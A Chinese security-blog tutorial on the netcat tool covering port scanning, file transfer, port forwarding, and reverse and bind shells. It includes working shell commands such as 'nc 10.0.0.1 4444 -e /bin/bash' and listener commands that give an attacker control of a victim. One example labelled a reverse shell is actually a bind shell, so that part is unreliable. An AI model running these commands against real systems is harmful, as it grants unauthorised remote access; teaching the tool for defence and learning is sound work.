点击蓝字
关注我们
始于理论,源于实践,终于实战
老付话安全,每天一点点
激情永无限,进步看得见
严正声明
本号所写文章方法和工具只用于学习和交流,严禁使用文章所述内容中的方法未经许可的情况下对生产系统进行方法验证实施,发生一切问题由相关个人承担法律责任,其与本号无关。
特此声明!!!
Netcat(简称 nc)是一个功能强大的 命令行网络工具,linux发行版都支持,window版可以使用namp自带的nc。
nc分为客户端模式:主动连接到指定主机和端口,之后所有键盘输入都会发送到远程主机。
服务器模式:监听指定端口等待连接,功能与客户端模式类似。
nc可以干什么?
端口扫描:检测目标主机的开放端口(类似 nmap)
文件传输:在两台机器之间传输文件
-
接收方 nc -l -p 端口 > file 将收到的数据写入文件。
-
发送方 nc IP 端口 < file 读取文件并发送。
端口转发:将流量从一个端口转发到另一个端口,
-
本地端口转发:将本地某个端口的流量转发到远程主机的指定端口。它能够绕过防火墙限制或访问不可达的远程服务。
-
远程端口转发:将远程主机的某个端口流量转发到本地服务。暴露本地服务到远程可访问的地址。
-
例如nc -l -p 8080 | nc 192.168.1.1 80
此命令将本地端口 8080 的流量转发到目标主机 192.168.1.1 上的 80 端口。
反弹 Shell:建立远程控制连接,(受害者主动连接攻击者,并绑定自己的 Shell(/bin/bash 或 cmd.exe)。攻击者获得交互式 Shell,可远程控制受害者。)
攻击者(监听):nc -lvnp 4444
-
受害者(反弹 Shell):
nc 10.0.0.1 4444 -e /bin/bash
(Windows 可用 -e cmd.exe)
-
例如,
-
目标机器上:nc -lvp 4444 -e /bin/bash
-
攻击者机器上:nc 192.168.1.2 4444
这会建立一个反向 shell 连接,让攻击者可以控制目标机器的 shell。
正向shell:攻击者直连目标(需目标主机有公网IP或可达内网IP,易被防火墙拦截(入站连接))
-
在目标主机(受害机)上执行
-
nc -lvnp 4444 -e /bin/bash # Linux
-
nc -lvnp 4444 -e cmd.exe # Windows
-
攻击者:nc 目标(受害者)IP 4444
END
原文始发于微信公众号(老付话安全):网络安全界的“瑞士军刀之netcat工具使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论